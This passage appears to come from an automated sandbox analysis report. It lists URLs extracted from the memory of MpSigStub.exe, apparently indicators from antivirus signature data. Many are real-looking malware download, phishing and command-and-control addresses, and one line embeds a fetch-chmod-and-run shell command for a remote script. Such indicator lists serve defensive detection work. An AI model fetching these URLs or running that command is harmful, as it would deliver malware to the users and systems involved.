Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: http://enomioms.club/msw/
Source: MpSigStub.exe, 00000024.00000003.6441407992.00000197A4404000.00000004.00000001.sdmp String found in binary or memory: http://erasoltours.com/logs/hixfibqw.php
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: http://erlivia.ltd
Source: MpSigStub.exe, 00000024.00000003.6307248389.00000197A3A78000.00000004.00000001.sdmp String found in binary or memory: http://ermi.co.zw/ds/2312.gif
Source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp String found in binary or memory: http://errors.crossrider.com/utility.gif
Source: MpSigStub.exe, 00000024.00000003.6329696621.00000197A4DE7000.00000004.00000001.sdmp String found in binary or memory: http://errors.statsmyapp.com
Source: MpSigStub.exe, 00000024.00000003.6288538370.00000197A46DA000.00000004.00000001.sdmp String found in binary or memory: http://errors.statsmyapp.com/installer-error.gif?action=wrapper
Source: MpSigStub.exe, 00000024.00000003.6288538370.00000197A46DA000.00000004.00000001.sdmp String found in binary or memory: http://errors.statsmyapp.com/installer-error.gif?action=wrapperxk
Source: MpSigStub.exe, 00000024.00000003.6329696621.00000197A4DE7000.00000004.00000001.sdmp String found in binary or memory: http://errors.statsmyapp.comxa
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: http://escritorioharpia.com/wp-content/upgrade/resume.php?id=
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp String found in binary or memory: http://esiglass.it/glassclass/glass.php
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp String found in binary or memory: http://esmxc01.top/download.php?file=lv.exe
Source: MpSigStub.exe, 00000024.00000003.6321843775.00000197A2FD4000.00000004.00000001.sdmp String found in binary or memory: http://esp1k.myddns.me/
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://image.soso.com/image.cgi?w=%s
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp String found in binary or memory: http://images-saver.pw/
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://images.google.cn/images?q=%s
Source: MpSigStub.exe, 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp String found in binary or memory: http://images.timekard.com/default.png
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://imd.gdyiping.com
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp String found in binary or memory: http://img-save.xyz
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://img.zhongsou.com/i?w=%s
Source: MpSigStub.exe, 00000024.00000003.6311649432.00000197A38AA000.00000004.00000001.sdmp String found in binary or memory: http://imp.fusioninstall.com/impression.do/?event=installer_start&referrer=x
Source: MpSigStub.exe, 00000024.00000003.6289251468.00000197A3F1F000.00000004.00000001.sdmp String found in binary or memory: http://imp.mymapsxp.com/
Source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp String found in binary or memory: http://imp.theweathercenter.co/
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://impemarinestore.com/stub.exe
Source: MpSigStub.exe, 00000024.00000003.6433381009.00000197A3C87000.00000004.00000001.sdmp String found in binary or memory: http://in-t-h-e.cn/show/main.php?r=
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: http://incredicole.com/wp-content/themes/elegant-grunge/images/msg.jpg
Source: MpSigStub.exe, 00000024.00000003.6319752266.00000197A3FE5000.00000004.00000001.sdmp String found in binary or memory: http://indonesiacyberteam.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp String found in binary or memory: http://inent17alexe.rr
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp String found in binary or memory: http://infolokercpns.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6316460209.00000197A40AB000.00000004.00000001.sdmp String found in binary or memory: http://init.crash-analysis.com
Source: MpSigStub.exe, 00000024.00000003.6316460209.00000197A40AB000.00000004.00000001.sdmp String found in binary or memory: http://init.icloud-analysis.com
Source: MpSigStub.exe, 00000024.00000003.6316460209.00000197A40AB000.00000004.00000001.sdmp String found in binary or memory: http://init.icloud-diagnostics.com
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp String found in binary or memory: http://injectsorals.com/
Source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp String found in binary or memory: http://inline477.info/fsrv
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: http://inquiry.space/lucky.doc
Source: MpSigStub.exe, 00000024.00000003.6288538370.00000197A46DA000.00000004.00000001.sdmp String found in binary or memory: http://ins.quickinstallpack.com/?action=
Source: MpSigStub.exe, 00000024.00000003.6282020026.00000197A450D000.00000004.00000001.sdmp String found in binary or memory: http://ins.rdxrp.com/stats/
Source: MpSigStub.exe, 00000024.00000003.6288538370.00000197A46DA000.00000004.00000001.sdmp String found in binary or memory: http://insf.quickinstallpack.com/?action=
Source: MpSigStub.exe, 00000024.00000003.6308253805.00000197A3EDD000.00000004.00000001.sdmp String found in binary or memory: http://insightout-me.com/backup/excellview.php
Source: MpSigStub.exe, 00000024.00000003.6327269415.00000197A3790000.00000004.00000001.sdmp String found in binary or memory: http://install.outbrowse.com/logTrack.php?x
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp String found in binary or memory: http://install.xxxtoolbar.com/ist/scripts/prompt.php?
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp String found in binary or memory: http://installation59.website/my/
Source: MpSigStub.exe, 00000024.00000003.6345553259.00000197A36F1000.00000004.00000001.sdmp String found in binary or memory: http://installdream.com/download/blankNet2.dat
Source: MpSigStub.exe, 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp String found in binary or memory: http://installer.mediapassplugin.com/
Source: MpSigStub.exe, 00000024.00000003.6315850680.00000197A403E000.00000004.00000001.sdmp String found in binary or memory: http://installmp3codec.info/
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp String found in binary or memory: http://installs.hotbar.com/installs/hotbar/programs/
Source: MpSigStub.exe, 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp String found in binary or memory: http://instamailserver.link/finito.ps1
Source: MpSigStub.exe, 00000024.00000003.6308253805.00000197A3EDD000.00000004.00000001.sdmp String found in binary or memory: http://instituitartetculture.com/
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: http://instituthypnos.com/maps1316/ki_d/
Source: MpSigStub.exe, 00000024.00000003.6345553259.00000197A36F1000.00000004.00000001.sdmp String found in binary or memory: http://int.dpool.sina.com.cn/iplookup/iplookup.php
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp String found in binary or memory: http://integrityshavenequinerescuecentre.ca/css/oswald-webfont/test.exe
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: http://interface.kokmobi.com/newservice
Source: MpSigStub.exe, 00000024.00000003.6311649432.00000197A38AA000.00000004.00000001.sdmp String found in binary or memory: http://interstat.eux
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp String found in binary or memory: http://investmenteducationkungykmtsdy8agender.duckdns.org/office/
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: http://ios-certificate-update.com
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: http://ios-update-whatsapp.com
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp String found in binary or memory: http://ip-api.com/
Source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp String found in binary or memory: http://ip-api.com/json/
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp String found in binary or memory: http://ip.aq138.com/setip.asp
Source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp String found in binary or memory: http://ippp.co.zw/ds/161120.gif
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp String found in binary or memory: http://iranvision1404.com/ss/info/redebit_transactions/terms/kohc-xuxo_lcxty-av6e
Source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp String found in binary or memory: http://isearch.omiga-plus.com/?type=sc
Source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp String found in binary or memory: http://ismailiyamedical.com/ds/151120.gif
Source: MpSigStub.exe, 00000024.00000003.6307634469.00000197A2ED4000.00000004.00000001.sdmp String found in binary or memory: http://istanbulyilbasimekanlari.com/tracking-number-
Source: MpSigStub.exe, 00000024.00000003.6272683059.00000197A4405000.00000004.00000001.sdmp String found in binary or memory: http://istart.webssearches.com/?type=sc
Source: MpSigStub.exe, 00000024.00000003.6315850680.00000197A403E000.00000004.00000001.sdmp String found in binary or memory: http://isvbr.net
Source: MpSigStub.exe, 00000024.00000003.6283505070.00000197A475E000.00000004.00000001.sdmp String found in binary or memory: http://isvbr.net?t=
Source: MpSigStub.exe, 00000024.00000003.6283505070.00000197A475E000.00000004.00000001.sdmp String found in binary or memory: http://itemprice.kr
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: http://itsmetees.com/wp-admin/network/doc/
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp String found in binary or memory: http://iy6h86i.sed.tiresnwheels4fun.com
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp String found in binary or memory: http://iz.orda.icu/webiz.php
Source: MpSigStub.exe, 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp String found in binary or memory: http://izfm.org/data/image/html/
Source: MpSigStub.exe, 00000024.00000003.6319752266.00000197A3FE5000.00000004.00000001.sdmp String found in binary or memory: http://jL.ch&#117;ra.pl&#47;rc/
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp String found in binary or memory: http://jaculus.ru/902b3449e3e8/interbase/counteract/neat/luxurious/relate/jjibwjhi.dot
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://jaklaw.co/wp-includes/js/plupload/db/view/
Source: MpSigStub.exe, 00000024.00000003.6341931442.00000197A45E4000.00000004.00000001.sdmp String found in binary or memory: http://james.newtonking.com/projects/json
Source: MpSigStub.exe, 00000024.00000003.6326212702.00000197A31D5000.00000004.00000001.sdmp String found in binary or memory: http://japanesecosplaygirl.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: http://jast56kl.com/help/index.php
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp String found in binary or memory: http://java.sun.com/products/autodl/j2se
Source: MpSigStub.exe, 00000024.00000003.6326212702.00000197A31D5000.00000004.00000001.sdmp String found in binary or memory: http://javascriptobfuscator.com
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: http://jay6.tech/wp-content/themes/twentynineteen/template-parts/cont
Source: MpSigStub.exe, 00000024.00000003.6286203133.00000197A3ABB000.00000004.00000001.sdmp String found in binary or memory: http://jetroute.net
Source: MpSigStub.exe, 00000024.00000003.6433381009.00000197A3C87000.00000004.00000001.sdmp String found in binary or memory: http://jiglid.com/ms.xlsx
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://jjjjjkl.pe.hu/doc
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: http://jmmgroup.ae/213.doc
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp String found in binary or memory: http://jobylive2.w22.haohaohost.cn/c/abbx/qqpost.asp
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp String found in binary or memory: http://joelosteel.gdn/eml/put.php
Source: MpSigStub.exe, 00000024.00000003.6268699778.00000197A4FF7000.00000004.00000001.sdmp String found in binary or memory: http://joelosteel.gdn/pi.php
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://josephioseph.com/htamandela.hta
Source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp String found in binary or memory: http://joxi.ru/
Source: MpSigStub.exe, 00000024.00000003.6307634469.00000197A2ED4000.00000004.00000001.sdmp String found in binary or memory: http://jquerystatistics.org/update.js
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp String found in binary or memory: http://js.f4321y.com/
Source: MpSigStub.exe, 00000024.00000003.6319752266.00000197A3FE5000.00000004.00000001.sdmp String found in binary or memory: http://js.k0102.com/ad
Source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp String found in binary or memory: http://js.mykings.pw:280/v.sctscrobj.dll
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp String found in binary or memory: http://js.mys2018.xyz:280/v.sct
Source: MpSigStub.exe, 00000024.00000003.6283505070.00000197A475E000.00000004.00000001.sdmp String found in binary or memory: http://js.pkglayer.com
Source: MpSigStub.exe, 00000024.00000003.6283505070.00000197A475E000.00000004.00000001.sdmp String found in binary or memory: http://js.pkglayer.comx
Source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: http://jugnitv.com/final.jpg
Source: MpSigStub.exe, 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp String found in binary or memory: http://jump.qq.com/clienturl_
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp String found in binary or memory: http://jump.qq.com/clienturl_100?clientuin=
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp String found in binary or memory: http://jump.qq.com/clienturl_15
Source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp String found in binary or memory: http://juntec.es/rechnung-18561/
Source: MpSigStub.exe, 00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp String found in binary or memory: http://jxmienphi.net/update/
Source: MpSigStub.exe, 00000024.00000003.6318199174.00000197A3059000.00000004.00000001.sdmp String found in binary or memory: http://jxvh.com/goto.php
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp, MpSigStub.exe, 00000024.00000003.6320126679.00000197A4068000.00000004.00000001.sdmp String found in binary or memory: http://jyhjyy.top
Source: MpSigStub.exe, 00000024.00000003.6345553259.00000197A36F1000.00000004.00000001.sdmp String found in binary or memory: http://kapper.st/info.txt
Source: MpSigStub.exe, 00000024.00000003.6278189283.00000197A3970000.00000004.00000001.sdmp String found in binary or memory: http://karab.hopto.org/sarg.dot
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://karadyma.com/dhlpack/kfqakff/)
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp String found in binary or memory: http://karafetdoll.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6288538370.00000197A46DA000.00000004.00000001.sdmp String found in binary or memory: http://kavok.ind.br/ds/2312.gif
Source: MpSigStub.exe, 00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp String found in binary or memory: http://kec-rupit.muratarakab.go.id/si/excelz/index.php?email=
Source: MpSigStub.exe, 00000024.00000003.6285606128.00000197A309B000.00000004.00000001.sdmp String found in binary or memory: http://keeppure.cn/tool/xxz.exe
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp String found in binary or memory: http://kemra.co.ke/bbaoh/
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp String found in binary or memory: http://keramikadecor.com.ua/bdfg/excelzz/index.php
Source: MpSigStub.exe, 00000024.00000003.6345862795.00000197A47E3000.00000004.00000001.sdmp String found in binary or memory: http://keratomir.biz/get.php?partner=
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: http://keyba01se.usa.cc/ktg.doc
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: http://khaleejposts.com/rgk/m_rs/
Source: MpSigStub.exe, 00000024.00000003.6307634469.00000197A2ED4000.00000004.00000001.sdmp String found in binary or memory: http://king.connectioncdn.
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: http://kiranacorp.com/oja
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp String found in binary or memory: http://kishi73.com.br/
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp String found in binary or memory: http://kit.mastacash.com/
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp String found in binary or memory: http://kle.austries
Source: MpSigStub.exe, 00000024.00000003.6321140724.00000197A3AFC000.00000004.00000001.sdmp String found in binary or memory: http://kokovs.cc/porno/stat.php
Source: MpSigStub.exe, 00000024.00000003.6282020026.00000197A450D000.00000004.00000001.sdmp, MpSigStub.exe, 00000024.00000003.6283505070.00000197A475E000.00000004.00000001.sdmp String found in binary or memory: http://korserver.com
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp String found in binary or memory: http://kovpro.com
Source: MpSigStub.exe, 00000024.00000003.6316460209.00000197A40AB000.00000004.00000001.sdmp String found in binary or memory: http://kp.9
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp String found in binary or memory: http://kredytinksao.pl/raw.txt
Source: MpSigStub.exe, 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp String found in binary or memory: http://kremlin-malwrhunterteam.info/scan.exe
Source: MpSigStub.exe, 00000024.00000003.6290223213.00000197A39E2000.00000004.00000001.sdmp String found in binary or memory: http://krisrnilton.pl/mswiner.exe/payload-obfuscated-final.docx
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://ks.pcgames.com.cn/games_index.jsp?q=%s
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://ks.pconline.com.cn/index.jsp?qx=download&q=%s
Source: MpSigStub.exe, 00000024.00000003.6283505070.00000197A475E000.00000004.00000001.sdmp String found in binary or memory: http://ksn.a
Source: MpSigStub.exe, 00000024.00000003.6307634469.00000197A2ED4000.00000004.00000001.sdmp String found in binary or memory: http://ktr.freedynamicdns.org/backups/post.php
Source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp String found in binary or memory: http://kubusse.ru/data
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: http://kungsb2africanbestfootballereverinkerso.duckdns.org/kung2doc/
Source: MpSigStub.exe, 00000024.00000003.6329696621.00000197A4DE7000.00000004.00000001.sdmp String found in binary or memory: http://kupeer.com/xd
Source: MpSigStub.exe, 00000024.00000003.6284057981.00000197A47A0000.00000004.00000001.sdmp String found in binary or memory: http://kurs.ru/index
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://l1ke.fellatiomovefilehost.net/movie.php?id=movies_n01.wmv&sid=
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp String found in binary or memory: http://lab.l4ever.cn/ip/api/
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp String found in binary or memory: http://lapapahoster.com/safe_download/
Source: MpSigStub.exe, 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp String found in binary or memory: http://laurenbowling.com/redeem-ucount-rewards-standardbank-credit=card-service/php/
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp String found in binary or memory: http://lavajatowi.sslblindado.com/
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: http://lazexpo.info/
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: http://led21.pro/wp-content/themes/betheme/images/headers/msg.jpg
Source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp String found in binary or memory: http://lem18iuru03vwvqwt.xyz/ff.gif
Source: MpSigStub.exe, 00000024.00000003.6282020026.00000197A450D000.00000004.00000001.sdmp String found in binary or memory: http://lh.cjishu.com/index.php
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp String found in binary or memory: http://lhx8z06.sed.nutritionservices.com
Source: MpSigStub.exe, 00000024.00000003.6310450817.00000197A4AFA000.00000004.00000001.sdmp String found in binary or memory: http://lialer.com/wFBIQQUccZOdYQKJvhxm/ejrwqokckt.exe
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: http://libre-templates.ddns.net/
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: http://librebooton.ddns.net/booton.dot
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp String found in binary or memory: http://libya2020.com.ly/music.mp3
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://lifeandoil.myjino.ru/crg-bin/c/admin/adobe_pdf/adobe.html
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp String found in binary or memory: http://lifehealthcareindia.com/google/google.php
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: http://lightday.pl/wp-content/themes/lightday/images/msg.jpg
Source: MpSigStub.exe, 00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp String found in binary or memory: http://likesomessfortelr.eu/mSsNX3JDSJD/inNSj398LSj/
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp String found in binary or memory: http://line.largefamiliesonpurpose.com/
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp String found in binary or memory: http://lineacount.info/cgi-bin/
Source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp String found in binary or memory: http://linkurytest-bumbleb-stats-westeurope.cloudapp.netxi
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp String found in binary or memory: http://linux.ghststr.com/lllol/0-o/tmp/s.sh&&cd/tmp/&&chmod777s.sh&&bashs.sh-o-2
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp String found in binary or memory: http://lipostes.tk/98765.pdf
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: http://lithi.io/file/
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp String found in binary or memory: http://livefrom.ge/modules/mod_swfobject/enfo.php
Source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp String found in binary or memory: http://liveswindows.cyou/opzi0n1.dll
Source: MpSigStub.exe, 00000024.00000003.6344346071.00000197A30DC000.00000004.00000001.sdmp String found in binary or memory: http://liveupdatesnet.com/
Source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp String found in binary or memory: http://lk2gaflsgh.jgy658snfyfnvh.com/
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://ll.protected.secured.adobe
Source: MpSigStub.exe, 00000024.00000003.6341224894.00000197A35D4000.00000004.00000001.sdmp String found in binary or memory: http://lnk.direct/xzx
Source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp String found in binary or memory: http://lnkiy.in/cloudfileshare
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: http://lo0oading.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://local45.net
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp String found in binary or memory: http://localhost/st.php
Source: MpSigStub.exe, 00000024.00000003.6345553259.00000197A36F1000.00000004.00000001.sdmp String found in binary or memory: http://localhost:4173/BaiduClickerClient.asmx?WSDLx
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://localhost:62338/Chipsetsync.asmx
Source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp String found in binary or memory: http://localhost:8000/cmd.exe
Source: MpSigStub.exe, 00000024.00000003.6321843775.00000197A2FD4000.00000004.00000001.sdmp String found in binary or memory: http://localstormwatch.com
Source: MpSigStub.exe, 00000024.00000003.6321843775.00000197A2FD4000.00000004.00000001.sdmp String found in binary or memory: http://localstormwatch.comx
Source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp String found in binary or memory: http://log.dataurls.com/log/settings.json
Source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp String found in binary or memory: http://log.dataurls.com/log/settings.jsonxN
Source: MpSigStub.exe, 00000024.00000003.6303735122.00000197A3500000.00000004.00000001.sdmp String found in binary or memory: http://log.newhybridhome.com/personal.dll
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: http://log.soomeng.com/wb/jdq/?mac=%s
Source: MpSigStub.exe, 00000024.00000003.6334856272.00000197A372A000.00000004.00000001.sdmp String found in binary or memory: http://logger.mobi
Source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp String found in binary or memory: http://logins.kl.com.ua/2.msiequati/.native
Source: MpSigStub.exe, 00000024.00000003.6320871262.00000197A4180000.00000004.00000001.sdmp String found in binary or memory: http://logs-01.loggly.com/inputs
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp String found in binary or memory: http://outfish.bounceme.net/outl.dot
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://ow.ly/1pyr308vbgz)
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://ow.ly/6gex303pfnn)
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp String found in binary or memory: http://ow.ly/QoHbJ
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://ow.ly/gwzp304opw4)
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp String found in binary or memory: http://ow.ly/gxqw308htwv)
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp String found in binary or memory: http://ow.ly/qiml30afntj)
Source: MpSigStub.exe, 00000024.00000003.6324553749.00000197A3B81000.00000004.00000001.sdmp String found in binary or memory: http://ow.ly/tdiy30flmvv
Source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: http://owwwc.com/mm/
Source: MpSigStub.exe, 00000024.00000003.6320871262.00000197A4180000.00000004.00000001.sdmp String found in binary or memory: http://p.b69kq.com/
Source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp String found in binary or memory: http://p.estonine.com
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://p.iask.com/p?k=%s
Source: MpSigStub.exe, 00000024.00000003.6320871262.00000197A4180000.00000004.00000001.sdmp String found in binary or memory: http://p.k3qh4.com/
